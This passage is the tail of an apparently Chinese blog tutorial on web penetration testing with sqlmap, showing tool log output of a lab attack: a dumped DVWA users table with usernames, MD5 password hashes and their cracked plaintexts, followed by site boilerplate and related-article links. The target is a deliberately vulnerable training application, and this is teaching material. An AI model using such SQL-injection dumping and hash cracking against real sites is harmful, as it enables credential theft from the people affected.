[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/

到了这里,关于web渗透测试实战-SQLMAP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(46)
  • 渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

    环境:对某网站进行渗透测试。 (PHP+Mysql开发的网站,用于WEB漏洞教学和检测的) 工具:sqlmap(Kali Linux中自带or官网下载Windows版) 此次实验所涉及的sqlmap参数: 一、信息收集 二、漏洞挖掘 (1)判断网站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目标网站地址\\\" --ba

    2024年02月15日
    浏览(44)
  • 渗透测试常用工具汇总_渗透测试实战

    Wireshark(前称Ethereal)是一个网络分包分析软件,是世界上使用最多的网络协议分析器。Wireshark 兼容所有主要的操作系统,如 Windows、Linux、macOS 和 Solaris。 kali系统里面自带有这个软件,我们可以直接使用;或者可以在网上下载windows版本,在windows系统里使用。 使用wireshark进

    2024年02月14日
    浏览(45)
  • 渗透利器-sqlmap超级详解

    目录 0X01 背景介绍 0X02 原理简述 0X03 参数说明 0X04 实战举例 0X05  高级用法 0X06 总结          官网: http://sqlmap.org         目前支持的数据库有: Altibase,Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft Access, Microsoft SQL Server,

    2024年02月04日
    浏览(32)
  • 渗透测试 | Web信息收集

    0x00 免责声明         本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!            

    2024年02月01日
    浏览(89)
  • WEB渗透测试流程

           首先学渗透成为网安的第一步是熟读《中华人民共和国网络安全法》和《中华人民共和国刑法》的相关法律法规。        什么是渗透测试,渗透测试并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评

    2024年02月04日
    浏览(34)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(40)
  • 渗透测试vulnhub——Web-2.0

    目录 1、信息收集 2、漏洞利用  3、John爆破 4、命令执行漏洞 5、lxd提权  知识点: 下载地址:AI: Web: 2 ~ VulnHub 1、信息收集 使用 arp-scan -l 查看靶机ip    靶机:192.168.29.133  进行服务扫描: -sV -A -p- -O     开启了   22tcp  80http  系统:linux -sv 服务信息、-A详细信息、-p- 所有端

    2024年01月17日
    浏览(43)
  • 渗透测试实战 - 外网渗透内网穿透(超详细)

    做到一半环境崩了,IP地址以下面为准 拿下三台主机权限 信息收集 使用dirsearch扫描192.168.41.136的网站目录,发现 http://192.168.41.136/index.php 是Thinkphp框架 nmap扫描端口 22/21端口 弱口令爆破(MSF,hydra) 3306端口 不允许远程IP登录 8888端口 宝塔界面未知账号密码无法利用 80端口 Think

    2023年04月22日
    浏览(40)
  • 实战渗透--一次对后台登录系统的简单渗透测试

    某网站后台登录界面 发现有验证码框 猜想会不会存在验证码绕过的漏洞 首先随意输入用户名密码(用于抓包) 打开burp抓包 分析数据包后 找到对应的传参点 即输入的账号密码还有验证码 这里可以看到 账号和密码全都是明文传输 并没有进行加密 所以更改起来还是很容易的

    2024年02月02日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包